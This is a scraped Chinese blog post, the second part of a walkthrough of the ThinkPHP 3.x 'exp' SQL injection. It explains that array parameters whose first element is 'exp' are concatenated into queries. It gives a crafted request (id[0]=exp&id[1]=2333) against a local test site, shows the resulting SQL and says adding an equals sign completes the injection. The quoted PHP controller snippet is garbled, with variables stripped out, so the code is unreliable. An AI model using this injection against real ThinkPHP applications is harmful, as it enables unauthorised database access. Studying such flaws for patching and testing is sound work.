Thinkphp 3.x exp注入(2)
标签:dump inf end span php ima load array com
接着上篇来看 https://www.cnblogs.com/cuocuo/p/14329379.html
<? IndexController = = M(‘user‘)->where((‘id‘ => ))->} }
http://127.0.0.1/?id=1
$val是传入的1
这里可以看到$exp是$val[0]
如果等于bind或者exp,就直接拼接
所以我们构造http://127.0.0.1/?id[0]=exp&id[1]=2333
可以看到SQL语句变成了SELECT * FROM `user` WHERE `Id` 2333 我们只需要在添加个等号即可注入
标签:dump inf end span php ima load array com
原文地址:https://www.cnblogs.com/cuocuo/p/14329868.html